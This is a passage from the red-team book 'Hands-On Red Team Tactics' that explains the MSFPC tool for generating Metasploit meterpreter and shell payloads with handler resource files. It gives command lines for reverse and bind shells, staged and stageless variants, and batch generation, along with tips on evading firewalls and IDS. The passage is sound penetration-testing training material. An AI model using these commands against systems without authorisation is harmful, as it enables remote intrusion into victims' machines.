Hands-On Red Team Tactics
上QQ阅读APP看书,第一时间看更新
上一章目录下一章

Resource file

As explained in the documentation of Metasploit (https://metasploit.help.rapid7.com/docs/resource-scripts), resource scripts provide an easy way for you to automate repetitive tasks in Metasploit. Conceptually, they're just like batch scripts. They contain a set of commands that are automatically and sequentially executed when you load the script in Metasploit. You can create a resource script by chaining together a series of Metasploit console commands and by directly embedding Ruby to do things such as call APIs, interact with objects in the database, and iterate actions.

Let's check out the .rc file generated by MSFPC in the preceding command:

The payload is set to windows/shell/reverse_tcp when the CMD option is used.

The msf option generates the payload with a custom cross-platform shell that uses the full potential of Metasploit:

sh msfpc.sh msf windows en0

If you look at the .rc file generated from MSFPC when the msf option is used, you'll see the difference in the payload used by the payload handler:

The payload is set to windows/meterpreter/reverse_tcp when the MSF option is used. The resource file can be executed with msfconsole, using the following command:

msfconsole -q -r 'windows-meterpreter-staged-reverse-tcp-443-exe.rc'

Where:

  • -q is used for quiet mode (no good looking for the MSF banner)
  • -r is used for the resource file

Once the payload is executed, the stager will request for other parts of the payload to be sent over to the target server. These parts of the payload will be sent by payload handler and the complete staged payload is delivered to the victim:

Note: The payload we used in the preceding image is x86 based but the system is x64 architecture. It's recommended that the payload should either match the same architecture as the operating system. In Metasploit we can either migrate from x86 based process to x64 based process or we can use the Metasploit post module post/windows/manage/archmigrate to migrate from x86 to x64 architecture.

  • BIND/REVERSE: The type of connection to be made once the payload is executed on the target system.
  • BIND: This shell connection will open a port on the target server and connect to it. To get a BIND connection is very rare as ingress (incoming) firewall rules block the ports on the target server.
./msfpc.sh bind msf windows en0

The preceding command will generate a Windows meterpreter payload, which will open a port on the target server and listen for a bind connection from our payload handler once the payload is executed. The port may not be accessible for connection due to firewall. In this situation, we can opt for reverse shell payloads which will bypass the firewall ruleset for outgoing connection and connect back to our system.

Out of the two files generated by MSFPC, let's check out the .rc file for this:

The payload is set to windows/meterpreter/bind_tcp instead of reverse_tcp, which shows that the payload handler will use a BIND connection to connect to the target server.

  • REVERSE: This shell connection will open a port on the attacker machine. Once the payload is executed, the target server will connect back to the attacker. To get a REVERSE connection is a very good way of bypassing ingress firewall blocks but this method can be blocked if egress (outbound) firewall rules are in place. By default, MSFPC will generate the payload with the REVERSE shell connection.
  • STAGED/STAGELESS: The type of payload to be used.
  • STAGED: This is the payload type that sends the payload in multiple stages, which makes it smaller in size but it relies on Metasploit's payload handler for sending the remainder of the parts to the target server. By default, MSFPC will generate a staged payload.
  • STAGELESS: This is a complete payload and is more stable and reliable than the STAGED payload but the size of this kind of payload is way too much in comparison to STAGED:
./msfpc.sh cmd stageless bind windows en0

The preceding command will generate a stageless windows executable payload when executed. It will open a port on the target system and listen for a BIND connection to get a standard Command Prompt:

Let's check the .rc file generated from the preceding command:

The payload is set to windows/shell_bind_tcp, which is a stageless payload. A staged payload in Metasploit would be windows/shell/bind_tcp.

  • TCP/HTTP/HTTPS/FIND_PORT: The communication method required by the payload to communicate with the payload handler.
  • TCP: This is the standard communication method once the payload is executed on the target server. This communication method can be used with any type of payload and payload format, but this can easily be detected by IDS and blocked by firewalls and IPS because of its unencrypted nature.
  • HTTP: If this option is used by MSFPC, the payload will use HTTP as the communication method. Instead of communicating on any given TCP port, the payload will communicate on port 80. This option can be used to bypass firewalls if only port 80 is open on the target system. This can be detected by IDS and blocked IPS because of its unencrypted nature.
  • HTTPS: This option is used when generating a payload that will use SSL communication. It's recommended to use this option for stealthy reverse connections.
  • FIND_PORT: This option is used when we are unable to get reverse connections from common ports (80, 443, 53, 21). If this option is set, MSFPC will generate the payload, which will try all 1-65535 ports for communication.
  • BATCH/LOOP: MSFPC can generate multiple payloads (multiple OS platforms) with a single command. This can be achieved by using either the BATCH Mode or LOOP Mode.
  • BATCH Mode: In the BATCH mode, MSFPC can generate multiple payloads with as many combinations of payload type as possible:
    ./msfpc batch windows en0

MSFPC generated all the combination of payloads for only Windows (as mentioned in the options) with their respective resource files (.rc):

  • LOOP Mode: This mode can generate multiple payloads of all types. MSFPC can also generate all the payloads for a given LHOST. This can be useful in an environment where we don't have the exact knowledge of the platform's OS. The payloads can be generated with the following command:
./msfpc.sh loop 192.168.10.122

MSFPC generates payloads with DEFAULT values for all the payload types with their respective resource files (.rc):

  • VERBOSE: This option is used if you want to get more information on what values are used by MSFPC while generating a payload:
    ./msfpc.sh loop 192.168.10.122 8080 verbose

In this case, LOOP mode is used to generate payloads with LPORT set to 8080.

The features of the tool are updated and maintained by its repository. It's highly recommended to look for tool updates online every two weeks.

上一章目录下一章